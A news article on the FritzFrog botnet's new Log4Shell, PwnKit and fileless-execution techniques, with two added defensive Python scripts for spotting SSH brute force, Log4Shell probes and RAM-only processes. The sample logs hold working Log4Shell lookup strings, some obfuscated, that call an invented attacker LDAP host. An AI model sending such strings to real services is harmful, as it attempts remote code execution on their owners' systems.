A new variant of an advanced botnet called “FritzFrog” is spreading via Log4Shell.
It has been more than two years since the critical Log4j vulnerability was first disclosed, yet attackers are still making good use of it, as many organizations remain unpatched, particularly, it seems, in the supposedly safe areas of their networks.
Unlike most Log4Shell attacks, FritzFrog, a Golang-based peer-to-peer botnet, does not use the flaw against Internet-facing systems and services. Its trick, rather, is to seek out and exploit the same vulnerability in internal network resources that organizations are less likely to have fixed.
And Log4Shell is just one of FritzFrog’s new tricks. “It appears that, for developers, this is an ongoing project: they are adapting it over time,” explains Ori David, a security researcher at Akamai and the author of a report published on February 1.
How FritzFrog spreads
Historically, FritzFrog has infected networks by brute-forcing Internet-facing servers with weak SSH passwords. The new variant builds on this tactic by reading system logs on compromised hosts in order to identify further potentially weak targets to spread to within the network.
In addition to weak passwords, it now also scans for hosts vulnerable to Log4Shell.
“It will compromise a resource in your environment by finding a weak SSH password, then it will scan your entire internal network and find vulnerable apps that would not be exposed to normal Log4Shell attacks,” David explains, referring to web-based attacks.
As he wrote in his report, the strategy works so well because “When the vulnerability was first discovered, Internet-facing applications were given priority for patching due to their significant risk of compromise. Conversely, internal machines, which were less likely to be exploited, were often neglected and remained unpatched, a circumstance of which FritzFrog takes advantage.”
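The two propagation paths described above leave different traces: a burst of failed SSH logins followed by a success in sshd's auth log on the host being brute-forced, and `${jndi:...}` lookup strings in the access logs of internal web applications that were never meant to be reachable from the Internet. The script below, an added example that is not part of the Akamai report or of FritzFrog itself, runs both checks over constructed sample logs (the hostnames, addresses and timestamps are invented) and then intersects the two source lists: an internal address that both brute-forces SSH and probes for Log4Shell is an already-infected peer inside the network, which is exactly the worm-like behaviour the article describes. The Log4Shell check first undoes the common lookup-based obfuscations (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`) so that a plain `jndi:` substring match is not enough to evade it.

```python
"""Detect FritzFrog-style propagation in logs (added example, constructed data).

1. SSH password brute force: many "Failed password" lines from one source,
   then an "Accepted password" from the same source.
2. Log4Shell probes: ${jndi:...} lookups in an internal app's access log,
   after resolving nested lookups the way vulnerable Log4j versions did.
3. Sources present in both lists are infected internal peers (the pivot).
"""
import re
from collections import Counter

# Constructed sshd log from an internal host "app01" (invented addresses).
SSHD_LOG = """\
Feb  1 10:00:01 app01 sshd[2211]: Failed password for root from 10.0.5.23 port 40122 ssh2
Feb  1 10:00:02 app01 sshd[2213]: Failed password for invalid user admin from 10.0.5.23 port 40124 ssh2
Feb  1 10:00:03 app01 sshd[2215]: Failed password for invalid user test from 10.0.5.23 port 40126 ssh2
Feb  1 10:00:04 app01 sshd[2217]: Failed password for root from 10.0.5.23 port 40128 ssh2
Feb  1 10:00:05 app01 sshd[2219]: Failed password for deploy from 10.0.5.23 port 40130 ssh2
Feb  1 10:00:06 app01 sshd[2221]: Accepted password for deploy from 10.0.5.23 port 40132 ssh2
Feb  1 10:03:00 app01 sshd[2300]: Failed password for alice from 10.0.1.7 port 51000 ssh2
Feb  1 10:03:05 app01 sshd[2302]: Accepted publickey for alice from 10.0.1.7 port 51002 ssh2
"""

# Constructed access log of an internal-only web app on "app02" (invented).
APP_LOG = """\
10.0.5.23 - - [01/Feb/2024:10:01:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://10.0.5.23:1389/a}"
10.0.5.23 - - [01/Feb/2024:10:01:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://10.0.5.23:1389/a}"
10.0.5.23 - - [01/Feb/2024:10:01:12 +0000] "GET /api HTTP/1.1" 404 12 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://10.0.5.23:1389/a}"
10.0.1.7 - - [01/Feb/2024:10:02:00 +0000] "GET /dashboard HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted password for \S+ from (\S+) port")


def ssh_bruteforce_sources(log_text, threshold=5):
    """Return {source_ip: (failure_count, logged_in_afterwards)} for noisy sources."""
    failures = Counter()
    logged_in = set()
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            failures[m.group(1)] += 1
            continue
        m = ACCEPTED.search(line)
        if m and failures[m.group(1)] >= threshold:
            logged_in.add(m.group(1))  # a password success after a burst of failures
    return {ip: (n, ip in logged_in) for ip, n in failures.items() if n >= threshold}


INNERMOST = re.compile(r"\$\{([^${}]*)\}")  # a ${...} lookup with nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve(body):
    """Evaluate one innermost Log4j lookup; unknown lookups are left untouched."""
    if ":-" in body:                        # ${x:-y}: failed lookup falls back to literal y
        return body.rsplit(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":   # ${lower:J} -> j
        return arg.lower()
    if sep and prefix.lower() == "upper":   # ${upper:j} -> J
        return arg.upper()
    return "${" + body + "}"                # e.g. ${jndi:...} itself: keep as is


def deobfuscate(text, max_rounds=20):
    """Resolve nested lookups from the inside out until the text stops changing."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def log4shell_probe_sources(log_text):
    """Return {source_ip: [decoded ${jndi:...} payloads]} found in an access log."""
    hits = {}
    for line in log_text.splitlines():
        m = JNDI.search(deobfuscate(line))
        if m:
            hits.setdefault(line.split(" ", 1)[0], []).append(m.group(0))
    return hits


def internal_pivots(sshd_log, app_log):
    """Sources that both brute-forced SSH and probed for Log4Shell: infected peers."""
    return sorted(set(ssh_bruteforce_sources(sshd_log)) & set(log4shell_probe_sources(app_log)))


if __name__ == "__main__":
    print("SSH brute-force sources:", ssh_bruteforce_sources(SSHD_LOG))
    print("Log4Shell probe sources:", log4shell_probe_sources(APP_LOG))
    print("Likely infected internal peers:", internal_pivots(SSHD_LOG, APP_LOG))
```

The brute-force threshold and the access-log format are assumptions for the sample; in a real deployment you would feed the same functions from your SIEM's sshd and HTTP sources and treat any internal address that appears in both outputs as a host to isolate first, since it is the one doing the spreading.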
The other new tricks from FritzFrog
Improved network scanning and Log4Shell exploitation are just two of FritzFrog’s latest updates.
To make privilege escalation a breeze, it now exploits CVE-2021-4034 (PwnKit), a memory corruption vulnerability in Polkit’s pkexec rated “high” (CVSS 7.8 out of 10). Although two years have passed since its disclosure, this trivially exploitable flaw is probably still widespread, since Polkit is installed by default in most Linux distributions.
The developers of FritzFrog also put a lot of thought into stealth. In addition to Tor support and an “antivirus” module that kills unrelated malware on a system, the new variant makes use of two features of Linux: the /dev/shm shared-memory filesystem and the memfd_create system call, which creates anonymous files that live only in RAM. The goal of both is to reduce the risk of detection by never writing the payload to disk.
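Both stealth techniques above, and the PwnKit privilege escalation described before them, can be hunted for on a live host with little more than /proc and stat. A process started from a memfd_create descriptor shows up with an executable link of the form `/memfd:<name> (deleted)`, and one started from /dev/shm shows a path under that tmpfs; neither has a regular file on disk to hand to an antivirus scanner. The script below is an added example, not FritzFrog's or Akamai's code: the classification is a pure function over (pid, exe-link target) pairs so it can be exercised on a constructed sample, and `scan_proc()` feeds it the real /proc. The pkexec check only reports whether the binary is still setuid root, which is the precondition for CVE-2021-4034; comparing the installed version against your distribution's advisory is left to the reader.

```python
"""Hunt for in-memory executables and a setuid pkexec (added example, not FritzFrog's code)."""
import os
import stat


def classify_exe(target):
    """Return why an /proc/<pid>/exe link target looks fileless, or None if it is benign."""
    if target.startswith("/memfd:"):
        return "memfd_create-backed executable (no file on disk)"
    if target.startswith("/dev/shm/"):
        return "executable under /dev/shm (tmpfs, RAM-only)"
    if target.endswith(" (deleted)"):
        return "executable unlinked after start"
    return None


def suspicious_processes(exe_targets):
    """exe_targets: {pid: readlink('/proc/<pid>/exe')} -> [(pid, target, reason)]."""
    found = []
    for pid, target in sorted(exe_targets.items()):
        reason = classify_exe(target)
        if reason:
            found.append((pid, target, reason))
    return found


def scan_proc(proc="/proc"):
    """Read the exe link of every live process we are allowed to inspect and classify it."""
    targets = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        try:
            targets[int(name)] = os.readlink(os.path.join(proc, name, "exe"))
        except OSError:  # kernel threads, zombies, or processes owned by other users
            continue
    return suspicious_processes(targets)


def pkexec_is_setuid(path="/usr/bin/pkexec"):
    """True if pkexec exists and is setuid root (the PwnKit attack surface), else False."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


# Constructed sample of /proc/<pid>/exe link targets (not taken from a real host).
SAMPLE_EXE_TARGETS = {
    1: "/usr/lib/systemd/systemd",
    2210: "/usr/sbin/sshd",
    4412: "/memfd:payload (deleted)",
    4420: "/dev/shm/.x/worker",
    4431: "/tmp/.build (deleted)",
}

if __name__ == "__main__":
    for pid, target, reason in suspicious_processes(SAMPLE_EXE_TARGETS):
        print(f"[sample] pid {pid}: {target} -> {reason}")
    for pid, target, reason in scan_proc():
        print(f"[live]   pid {pid}: {target} -> {reason}")
    print("pkexec is setuid root:", pkexec_is_setuid())
```

Run it as root to see every process; as an unprivileged user only your own processes are classified. If pkexec is reported as setuid root on a host that has not received the PwnKit fix, the interim mitigation published at disclosure was to drop the setuid bit with `chmod 0755 /usr/bin/pkexec` until the patched package is installed.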
These tricks, among others, have contributed to the botnet’s more than 20,000 attacks against more than 1,500 victims since it was first detected in 2020.
But for widespread malware with such varied weapons at its disposal, David says, its kryptonite is awfully simple: “FritzFrog propagates in two ways: weak SSH passwords and Log4Shell. So the best way to mitigate it would be to have good passwords, and to patch your systems.”